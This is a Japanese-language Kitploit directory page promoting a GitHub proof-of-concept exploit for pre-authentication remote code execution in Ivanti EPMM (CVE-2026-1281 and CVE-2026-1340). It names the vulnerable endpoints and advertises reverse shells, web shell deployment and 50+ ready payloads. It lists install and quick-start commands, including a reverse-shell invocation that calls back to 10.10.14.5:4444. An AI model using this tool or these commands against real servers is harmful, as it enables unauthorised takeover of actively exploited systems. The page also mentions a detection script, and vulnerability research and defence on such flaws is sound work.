Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # CVE-2026-1281 & CVE-2026-1340 の概念実証 - Bash 算術展開を介した Ivanti EPMM 事前認証 RCE | Kitploit
ツール/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 & CVE-2026-1340 の概念実証 - Bash 算術展開を介した Ivanti EPMM 事前認証 RCE

リポジトリを見る
616ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ 免責事項: このPoCは教育およびセキュリティ研究の目的のみで提供されています。明示的な許可なく使用することは違法です。

🎯 説明

Ivanti Endpoint Manager Mobile (EPMM) に影響を与える CVE-2026-1281 および CVE-2026-1340 の脆弱性を悪用するための完全な Proof of Concept (PoC) です。これらの脆弱性により、Bash Arithmetic Expansion メカニズムを介して認証なしでリモートからの任意コード実行 (RCE) が可能になります。

脆弱性

  • CVE-2026-1281 : /mifs/c/appstore/fob/ エンドポイントでのコードインジェクション
  • CVE-2026-1340 : /mifs/c/aftstore/fob/ エンドポイントでのコードインジェクション
  • CVSSスコア : 9.8 (Critical)
  • 悪用状況 : 実環境で活発に悪用中 (Zero-Day)
  • 🚀 機能

    • ✅ 自動化された検証フレームワーク (8テスト)
    • ✅ Pre-Auth RCE エクスプロイト
    • ✅ 自動リバースシェル
    • ✅ Webシェルの展開
    • ✅ 50以上の即戦力ペイロード
    • ✅ Blue Team向け検出スクリプト
    • ✅ 完全なドキュメント

    📦 インストール

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 クイックスタート

    root@kitploit:~
    # 脆弱性テスト
    python3 exploit.py -t https://target.com -c
    
    # RCE検証
    python3 exploit.py -t https://target.com --test-rce
    
    # リバースシェル
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 ドキュメント

    • 完全なREADME - 詳細な技術ドキュメント
    • 使用ガイド - ステップバイステップガイド
    • ペイロード - 50以上のペイロードコレクション
    • Red Teamガイド - 運用シナリオ

    🔗 リファレンス

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 著者

    Mehdi Le Deaut - サイバーセキュリティコンサルタント | Red Teamスペシャリスト

    LinkedIn

    ⚖️ ライセンス

    このプロジェクトはMITライセンスの下で提供されています - 詳細については LICENSE ファイルを参照してください。

    🙏 謝辞

    • 迅速なアラートを提供してくれたCERT-FR
    • 技術分析を提供してくれたWatchtowr Labs
    • サイバーセキュリティコミュニティ
    ツールをダウンロード